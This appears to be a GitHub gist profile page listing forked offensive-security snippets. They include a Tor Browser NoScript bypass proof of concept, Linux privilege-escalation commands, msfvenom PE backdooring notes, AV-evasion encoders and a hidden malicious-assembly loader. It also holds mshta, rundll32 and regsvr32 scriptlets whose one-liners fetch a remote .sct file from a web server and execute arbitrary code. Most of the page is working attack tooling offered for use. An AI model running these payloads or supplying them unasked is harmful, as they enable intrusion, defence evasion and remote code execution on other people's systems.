Skip to content

Instantly share code, notes, and snippets.

View jayaramyalla's full-sized avatar

jayaramyalla

6 followers · 5 following
View GitHub Profile
@jayaramyalla
jayaramyalla / nmapburp.sh
Created September 7, 2018 19:07 — forked from jgamblin/nmapburp.sh
NMap a network and send all open web servers to Burp.
#!/bin/bash
#Script to Scan All Sites Found With A Simple NMAP Scan With Burp.
sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}')
for site in $sites
do
curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1
printf "Scanning %s with burp.\\n" "$site"
done
@jayaramyalla
jayaramyalla / TorBrowser_7.x_NoScript_bypass.py
Created September 10, 2018 20:09 — forked from x0rz/TorBrowser_7.x_NoScript_bypass.py
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
@jayaramyalla
jayaramyalla / linux_privesc
Created September 16, 2018 07:10 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs
@jayaramyalla
jayaramyalla / msfvenom-reverse-tcp-WaitForSingleObject.md
Created September 18, 2018 19:21 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@jayaramyalla
jayaramyalla / remove-win-10-apps.md
Created September 18, 2018 19:23 — forked from filipesam/remove-win-10-apps.md
How to remove Windows 10 Apps (eg. "Photos")

How to remove Windows 10 Apps (eg. "Photos")

Open PowerShell (right click > run as Administrator), and enter Get-AppxPackage *photo* | Remove-AppxPackage For other apps just replace "photo" with something else.

If you want to look at the list of installed applications just use Get-AppxPackage, if you want to copy said list into a program better suited for working with text (eg. has search), just type Get-AppxPackage | clip

@jayaramyalla
jayaramyalla / transformFile.py
Created September 30, 2018 12:20 — forked from Arno0x/transformFile.py
Performs multiple useful transformation on files
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
@jayaramyalla
jayaramyalla / poshB64Encode.sh
Created September 30, 2018 12:21 — forked from Arno0x/poshB64Encode.sh
#!/bin/bash
echo "Base64 encoded, ready to be used with 'powershell -e':"
echo "$1" | iconv --to-code UTF-16LE | base64 -w 0
echo
@jayaramyalla
jayaramyalla / malicious.cs
Created September 30, 2018 12:21 — forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
/*
Author: Arno0x0x, Twitter: @Arno0x0x
DO NOT COMPILE THIS SOURCE FILE !
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
@jayaramyalla
jayaramyalla / scriptlet.sct
Created September 30, 2018 12:23 — forked from Arno0x/scriptlet.sct
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
@jayaramyalla
jayaramyalla / regsvr32.sct
Created September 30, 2018 12:23 — forked from Arno0x/regsvr32.sct
A scriptlet that can be executed by regsvr32.exe for arbitrary code execution
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[